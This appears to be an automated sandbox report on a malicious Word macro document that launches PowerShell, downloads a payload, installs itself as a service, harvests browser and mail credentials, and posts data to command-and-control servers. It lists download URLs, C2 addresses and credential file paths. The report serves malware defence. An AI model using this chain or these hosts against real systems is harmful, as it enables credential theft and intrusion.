
Analysis Report

Overview

General Information

Joe Sandbox Version: 20.0.0
Analysis ID: 33605
Start time: 19:34:12
Joe Sandbox Product: CloudBasic
Start date: 06.10.2017
Overall analysis duration: 0h 14m 1s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: new order upcoming.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • VBA Instrumentation enabled
Detection: MAL
Classification: mal100.evad.expl.phis.spyw.troj.winDOC@25/11@1/5
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 57
  • Number of non-executed functions: 114
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 51.2% (good quality ratio 46.9%)
  • Quality average: 79.5%
  • Quality standard deviation: 31.6%
Cookbook Comments:
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint document
  • Simulate clicks
  • Found new Word/Excel subprocess, stop clicking
  • Number of clicks 18
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): conhost.exe, dllhost.exe
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryDirectoryFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE, powershell.exe


Detection

Strategy: Threshold | Score: 100 | Range: 0 - 100 | Reporting: Report FP / FN | Detection: malicious


Confidence

Strategy: Threshold | Score: 5 | Range: 0 - 5 | Further Analysis Required?: false


Classification

Analysis Advice

All of the sample's HTTP requests are for non-existing resources; the sample is likely no longer working.
Uses HTTPS for network communication; use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis.



Signature Overview



AV Detection:

Antivirus detection for domain / URL
Source: marley.net | virustotal: Detection: 4%
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\39530.exe | virustotal: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\39530.exe | metadefender: Detection: 12%
Antivirus detection for submitted file
Source: new order upcoming.doc | virustotal: Detection: 52%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Code function: 5_2_003E22D4 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptEncrypt,CryptExportKey,CryptGetHashParam,CryptDestroyHash,GetProcessHeap,HeapFree | 5_2_003E22D4
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Code function: 5_2_003E21E4 memset,CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext | 5_2_003E21E4
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Code function: 5_2_003E2401 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,GetProcessHeap,HeapFree | 5_2_003E2401
Source: C:\Windows\System32\wlangdi.exe | Code function: 7_2_002E8642 memset,_snwprintf,CreateMutexW,WaitForSingleObject,_snwprintf,_snwprintf,CreateMutexW,CreateEventW,SignalObjectAndWait,ResetEvent,ReleaseMutex,CloseHandle,GetTickCount,CreateTimerQueueTimer,WaitForSingleObject,DeleteTimerQueueTimer,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext | 7_2_002E8642
Source: C:\Windows\System32\wlangdi.exe | Code function: 7_2_002E2401 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,GetProcessHeap,HeapFree | 7_2_002E2401
Source: C:\Windows\System32\wlangdi.exe | Code function: 7_2_002E21E4 memset,CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext | 7_2_002E21E4
Source: C:\Windows\System32\wlangdi.exe | Code function: 7_2_002E22D4 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptEncrypt,CryptExportKey,CryptGetHashParam,CryptDestroyHash,GetProcessHeap,HeapFree | 7_2_002E22D4
Source: C:\Windows\System32\QYIyP.exe | Code function: 9_2_00A021E4 memset,CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext | 9_2_00A021E4
Source: C:\Windows\System32\QYIyP.exe | Code function: 9_2_00A022D4 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptEncrypt,CryptExportKey,CryptGetHashParam,CryptDestroyHash,GetProcessHeap,HeapFree | 9_2_00A022D4
Source: C:\Windows\System32\QYIyP.exe | Code function: 9_2_00A02401 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,GetProcessHeap,HeapFree | 9_2_00A02401

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Code function: 5_2_003E21E4 memset,CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext | 5_2_003E21E4
Source: C:\Windows\System32\wlangdi.exe | Code function: 7_2_002E21E4 memset,CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext | 7_2_002E21E4
Source: C:\Windows\System32\QYIyP.exe | Code function: 9_2_00A021E4 memset,CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext | 9_2_00A021E4

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic | DNS query: name: marley.net
Potential document exploit detected (performs HTTP gets)
Source: global traffic | TCP traffic: 192.168.2.2:49167 -> 147.135.209.118:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic | TCP traffic: 192.168.2.2:49166 -> 69.195.124.165:80
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking:

Contains functionality to download additional files from the internet
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Code function: 5_2_003E1CCB HttpQueryInfoW,GetProcessHeap,RtlAllocateHeap,InternetReadFile,InternetReadFile,GetProcessHeap,HeapFree | 5_2_003E1CCB
Downloads files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /hlJm/ HTTP/1.1 | Host: marley.net | Connection: Keep-Alive
Found strings which match to known social media urls
Source: wlangdi.exe | String found in binary or memory: 7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: wlangdi.exe | String found in binary or memory: 7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: wlangdi.exe | String found in binary or memory: Hotmail/MSN equals www.hotmail.com (Hotmail)
Source: wlangdi.exe | String found in binary or memory: lcome.htmlres://C:%5CUsers%5CHERBBL~1%5CAppData%5CLocal%5CTemp%5Cjds796915.tmp%5Cjxpiinstall.exe/progress.htmlhttps://download-installer.cdn.mozilla.net/pub/firefox/releases/54.0.1/win32/en-US/Firefox%20Setup%20Stub%2054.0.1.exehttps://www.microsoft.com/en-us/ie-firstrun/win-7/ie-11/res1.windows.microsoft.com/resources/4.2/wol/shared/images/favicon.icohttps://www.microsoft.com/en-us/ie-firstrun/win-7/ie-11/uihttps://www.mozilla.org/de/firefox/newhttps://www.mozilla.org/en-US/firefox/newhttps://www.mozilla.org/en-US/firefox/new/?scene=2https://www.mozilla.org/en-US/firefox/new/res://C:\Users\user\Downloads\flashplayer26_xa_install.exe/160https://support.microsoft.com/products/internet-explorerhttps://support.microsoft.com/internet-explorerhttps://support.microsoft.com/en-us/products/internet-explorerres://C:\Users\user\Downloads\readerdc_en_xa_crd_install.exe/160https://c1.microsoft.com/c.gif?DI=4050&did=1&t=https://c1.microsoft.com/c.gifhttps://adobe-d.openx.net/w/1.0/afr?auid=463664&cb=INS
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: marley.net
Posts data to webserver
Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 147.135.209.118:443 | Content-Length: 324 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: [raw request body bytes omitted]
Tries to download non-existing http data (HTTP/1.1 404 Not Found)
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 06 Oct 2017 17:35:11 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 61908 | Connection: keep-alive | Data Raw: [raw response body bytes omitted]
Urls found in memory or binary data
Source: powershell.exe | String found in binary or memory: file://
Source: WINWORD.EXE, powershell.exe | String found in binary or memory: file:///
Source: WINWORD.EXE | String found in binary or memory: file:///c:
Source: WINWORD.EXE | String found in binary or memory: file:///c:/users/herb%20blackburn/desktop/new%20order%20upcoming.doc
Source: powershell.exe | String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/n
Source: powershell.exe | String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/x
Source: powershell.exe | String found in binary or memory: http://
Source: powershell.exe | String found in binary or memory: http://austx
Source: powershell.exe | String found in binary or memory: http://austxport.com.au/redbeandesign/zaw/
Source: wlangdi.exe | String found in binary or memory: http://crl4.digicert.com/digicerthighassuranceevrootca.crl0=
Source: powershell.exe | String found in binary or memory: http://ctmket.com/fwdbho/
Source: powershell.exe | String found in binary or memory: http://d
Source: powershell.exe | String found in binary or memory: http://deinc.com/uqpkzqxqq/
Source: wlangdi.exe | String found in binary or memory: http://https://:stringdatawininetcachecredentialsftp://dpapi:captionmenu_%ddialog_%dstringsgeneralsy
Source: powershell.exe | String found in binary or memory: http://marley.ne
Source: powershell.exe | String found in binary or memory: http://marley.net
Source: powershell.exe | String found in binary or memory: http://marley.net/hljm/
Source: powershell.exe | String found in binary or memory: http://marley.netx&zk8
Source: powershell.exe | String found in binary or memory: http://marley.nex
Source: wlangdi.exe | String found in binary or memory: http://ocsp.digicert.com0k
Source: powershell.exe | String found in binary or memory: http://q-productions.com/jkxhsksgj/
Source: powershell.exe | String found in binary or memory: http://q-productions.com/jkxhsksgj/t
Source: powershell.exe | String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationfilter
Source: powershell.exe | String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/wsman/selectorfilter
Source: powershell.exe | String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#identifyresponse
Source: wlangdi.exe | String found in binary or memory: http://t1.symcb.com/thawtepca.crl0/
Source: wlangdi.exe | String found in binary or memory: http://t2.symcb.com0a
Source: wlangdi.exe | String found in binary or memory: http://www.nirsoft.net/
Source: wlangdi.exe | String found in binary or memory: https://download-installer.cdn.mozilla.net/pub/firefox/releases/54.0.1/win32/en-us/firefox%20setup%2
Source: wlangdi.exe | String found in binary or memory: https://www.digicert.com/cps0
Source: wlangdi.exe | String found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/l
Source: wlangdi.exe | String found in binary or memory: https://www.thawte.com/cps0)
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49167
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET /hlJm/ HTTP/1.1 | Host: marley.net | Connection: Keep-Alive
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 147.135.209.118:443 | Content-Length: 324 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: [raw request body bytes omitted]
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 198.1.78.129:8080 | Content-Length: 340 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: [raw request body bytes omitted]
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 46.4.67.203:7080 | Content-Length: 324 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: [raw request body bytes omitted]
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 46.4.67.203:7080 | Content-Length: 340 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: [raw request body bytes omitted]
Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.2.2:49168 -> 198.1.78.129:8080
Source: global traffic | TCP traffic: 192.168.2.2:49169 -> 46.4.67.203:7080
Uses known network protocols on non-standard ports
Source: unknown | Network traffic detected: HTTP traffic on port 49169 -> 7080
Source: unknown | Network traffic detected: HTTP traffic on port 7080 -> 49169

Boot Survival:

Contains functionality to start windows services
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Code function: 5_2_003E8ABC lstrcmpiW,memset,memset,SHFileOperationW,GetTempPathW,GetTempFileNameW,SHFileOperationW,SHFileOperationW,OpenSCManagerW,CreateServiceW,OpenServiceW,EnumServicesStatusExW,GetLastError,GetProcessHeap,RtlAllocateHeap,EnumServicesStatusExW,OpenServiceW,QueryServiceConfig2W,GetLastError,GetProcessHeap,RtlAllocateHeap,QueryServiceConfig2W,GetProcessHeap,HeapFree,CloseServiceHandle,GetProcessHeap,HeapFree,ChangeServiceConfig2W,GetProcessHeap,HeapFree,StartServiceW,CloseServiceHandle,CloseServiceHandle,memset,CreateProcessW,CloseHandle,CloseHandle | 5_2_003E8ABC

Stealing of Sensitive Information:

Searches for Windows Mail specific files
Source: C:\Windows\System32\wlangdi.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
Source: C:\Windows\System32\wlangdi.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Windows\System32\wlangdi.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Windows\System32\wlangdi.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Windows\System32\wlangdi.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup unknown
Source: C:\Windows\System32\wlangdi.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Windows\System32\wlangdi.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new unknown
Source: C:\Windows\System32\wlangdi.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery *
Source: C:\Windows\System32\wlangdi.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery unknown
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\System32\wlangdi.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\System32\wlangdi.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\cert8.db
Source: C:\Windows\System32\wlangdi.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\wlangdi.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\4ah7hlda.default\cert7.db
Source: C:\Windows\System32\wlangdi.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\secmod.db
Source: C:\Windows\System32\wlangdi.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\key3.db
Source: C:\Windows\System32\wlangdi.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\4ah7hlda.default\cert8.db
Source: C:\Windows\System32\wlangdi.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\4ah7hlda.default\secmod.db
Source: C:\Windows\System32\wlangdi.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\places.sqlite
Tries to steal Instant Messenger accounts or passwords
Source: C:\Windows\System32\wlangdi.exe | Key opened: HKEY_USERS\Software\Google\Google Talk\Accounts
Tries to steal Mail credentials (via file access)
Source: C:\Windows\System32\wlangdi.exe | Key opened: HKEY_USERS\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\System32\wlangdi.exe | Key opened: HKEY_USERS\Identities\{C989D9FB-AC77-4182-809E-7F5679D38F00}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\System32\wlangdi.exe | Key opened: HKEY_USERS\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\System32\wlangdi.exe | Key opened: HKEY_USERS\Software\IncrediMail\Identities
Source: C:\Windows\System32\wlangdi.exe | Key opened: HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
Source: C:\Windows\System32\wlangdi.exe | Key opened: HKEY_USERS\Software\Microsoft\Windows Live Mail
Source: C:\Windows\System32\wlangdi.exe | Key opened: HKEY_USERS\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NULL

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\System32\wlangdi.exe | File created: C:\Windows\System32\QYIyP.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\39530.exe
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\System32\wlangdi.exe | File created: C:\Windows\System32\QYIyP.exe
May use bcdedit to modify the Windows boot settings
Source: wlangdi.exe | Binary or memory string: 7bcdedit.exe)
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\QYIyP.exe | Executable created and started: C:\Windows\system32\QYIyP.exe
Source: C:\Windows\System32\wlangdi.exe | Executable created and started: C:\Windows\System32\wlangdi.exe

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Code function: 4_2_004F1D8F VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree | 4_2_004F1D8F
PE file contains an invalid checksum
Source: QYIyP.exe.7.dr | Static PE information: real checksum: 0x9ed163c7 should be: 0x1e39a
Source: 39530.exe.2.dr | Static PE information: real checksum: 0x0 should be: 0x21090
PE file contains sections with non-standard names
Source: QYIyP.exe.7.dr | Static PE information: section name: .code
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Code function: 4_2_004F11E4 push ds; retf | 4_2_004F13A5
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Code function: 4_2_004F1010 push ss; retf | 4_2_004F1011
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Code function: 5_2_003E1010 push ss; retf | 5_2_003E1011
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Code function: 5_2_003E11E4 push ds; retf | 5_2_003E13A5
Source: C:\Windows\System32\wlangdi.exe | Code function: 6_2_002E11E4 push ds; retf | 6_2_002E13A5
Source: C:\Windows\System32\wlangdi.exe | Code function: 6_2_002E1010 push ss; retf | 6_2_002E1011
Source: C:\Windows\System32\wlangdi.exe | Code function: 7_2_002E11E4 push ds; retf | 7_2_002E13A5
Source: C:\Windows\System32\wlangdi.exe | Code function: 7_2_002E1010 push ss; retf | 7_2_002E1011
Source: C:\Windows\System32\QYIyP.exe | Code function: 8_2_0051122A push ds; retf | 8_2_005113A5
Source: C:\Windows\System32\QYIyP.exe | Code function: 8_2_005111E4 push ds; retf | 8_2_005113A5
Source: C:\Windows\System32\QYIyP.exe | Code function: 8_2_00511010 push ss; retf | 8_2_00511011
Source: C:\Windows\System32\QYIyP.exe | Code function: 9_2_00A011E4 push ds; retf | 9_2_00A013A5
Source: C:\Windows\System32\QYIyP.exe | Code function: 9_2_00A0122A push ds; retf | 9_2_00A013A5
Source: C:\Windows\System32\QYIyP.exe | Code function: 9_2_00A01010 push ss; retf | 9_2_00A01011
Binary contains a suspicious time stamp
Source: initial sample | Static PE information: 0xE784FEEB [Sat Jan 31 15:08:27 2093 UTC]
Document contains an embedded VBA with many string operations indicating source code obfuscation
Source: new order upcoming.doc | Stream path 'Macros/VBA/Module1': High number of string operations
Source: VBA code instrumentation | OLE, VBA macro, High number of string operations: Module Module1 | Name: Module1

Spreading:

Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch

System Summary:

Checks whether correct version of .NET is installed
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Upgrades
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Document has a 'comments' value indicative for goodware
Source: new order upcoming.doc | Initial sample: OLE summary comments = poWERShell -e [encoded command removed]
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: C:\Symbols\aagmmc.pdb source: wlangdi.exe
Source: Binary string: D:\office\Target\word\x86\ship\0\msword.PDB source: WINWORD.EXE
Source: Binary string: mscorrc.pdb source: powershell.exe
Source: Binary string: TEQUILABOOMBOOMWilbertSCCWadminSystemITC:\Symbols\aagmmc.pdbKLONE_X64-PCJohn DoeBEA-CHIJohnC:\take_screenshot.ps1C:\loaddll.exeC:\email.docC:\email.htmC:\123\email.docC:\123\email.docxC:\a\foobar.bmpC:\a\foobar.docC:\a\foobar.gif source: wlangdi.exe
Source: Binary string: 0=TEQUILABOOMBOOMWilbertSCCWadminSystemITC:\Symbols\aagmmc.pdbKLONE_X64-PCJohn DoeBEA-CHIJohnC:\take_screenshot.ps1C:\loaddll.exeC:\email.docC:\email.htmC:\123\email.docC:\123\email.docxC:\a\foobar.bmpC:\a\foobar.docC:\a\foobar.gif*F source: 39530.exe
Source: Binary string: D:\office\Target\outlook\x86\ship\1033\mapiR.pdb source: wlangdi.exe
Source: Binary string: mspdbsrv_winx86_100.pdb source: wlangdi.exe, 39530.exe.2.dr
Source: Binary string: 0@TEQUILABOOMBOOMWilbertSCCWadminSystemITC:\Symbols\aagmmc.pdbKLONE_X64-PCJohn DoeBEA-CHIJohnC:\take_screenshot.ps1C:\loaddll.exeC:\email.docC:\email.htmC:\123\email.docC:\123\email.docxC:\a\foobar.bmpC:\a\foobar.docC:\a\foobar.gif source: wlangdi.exe
Source: Binary string: 0@TEQUILABOOMBOOMWilbertSCCWadminSystemITC:\Symbols\aagmmc.pdbKLONE_X64-PCJohn DoeBEA-CHIJohnC:\take_screenshot.ps1C:\loaddll.exeC:\email.docC:\email.htmC:\123\email.docC:\123\email.docxC:\a\foobar.bmpC:\a\foobar.docC:\a\foobar.gif*F source: wlangdi.exe
Source: Binary string: 0PTEQUILABOOMBOOMWilbertSCCWadminSystemITC:\Symbols\aagmmc.pdbKLONE_X64-PCJohn DoeBEA-CHIJohnC:\take_screenshot.ps1C:\loaddll.exeC:\email.docC:\email.htmC:\123\email.docC:\123\email.docxC:\a\foobar.bmpC:\a\foobar.docC:\a\foobar.gif source: QYIyP.exe
Source: Binary string: 0-TEQUILABOOMBOOMWilbertSCCWadminSystemITC:\Symbols\aagmmc.pdbKLONE_X64-PCJohn DoeBEA-CHIJohnC:\take_screenshot.ps1C:\loaddll.exeC:\email.docC:\email.htmC:\123\email.docC:\123\email.docxC:\a\foobar.bmpC:\a\foobar.docC:\a\foobar.gif*F source: wlangdi.exe
Source: Binary string: mspdbsrv_winx86_100.pdb@: source: wlangdi.exe, 39530.exe.2.dr
Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: wlangdi.exe
Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: wlangdi.exe
Source: Binary string: 0NTEQUILABOOMBOOMWilbertSCCWadminSystemITC:\Symbols\aagmmc.pdbKLONE_X64-PCJohn DoeBEA-CHIJohnC:\take_screenshot.ps1C:\loaddll.exeC:\email.docC:\email.htmC:\123\email.docC:\123\email.docxC:\a\foobar.bmpC:\a\foobar.docC:\a\foobar.gif*F source: 39530.exe
Source: Binary string: D:\office\Target\outlook\x86\ship\1033\mapiR.pdbPDB source: wlangdi.exe
Document has a 'bytes' value indicative for goodware
Source: new order upcoming.doc | Initial sample: OLE document summary bytes = 55296
Binary contains paths to development resources
Source: WINWORD.EXE | Binary or memory string: Unrecognized project languageSThe .VBP file for this project contains an invalid or corrupt library references ID=Error accessing file. Network connection may have been lost.-Fixed or static data can't be larger than 64K
Classification label
Source: classification engine | Classification label: mal100.evad.expl.phis.spyw.troj.winDOC@25/11@1/5
Contains functionality to create services
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe | Code function: lstrcmpiW,memset,memset,SHFileOperationW,GetTempPathW,GetTempFileNameW,SHFileOperationW,SHFileOperationW,OpenSCManagerW,CreateServiceW,OpenServiceW,EnumServicesStatusExW,GetLastError,GetProcessHeap,RtlAllocateHeap,EnumServicesStatusExW,OpenServiceW,QueryServiceConfig2W,GetLastError,GetProcessHeap,RtlAllocateHeap,QueryServiceConfig2W,GetProcessHeap,HeapFree,CloseServiceHandle,GetProcessHeap,HeapFree,ChangeServiceConfig2W,GetProcessHeap,HeapFree,StartServiceW,CloseServiceHandle,CloseServiceHandle,memset,CreateProcessW,CloseHandle,CloseHandle,5_2_003E8ABC
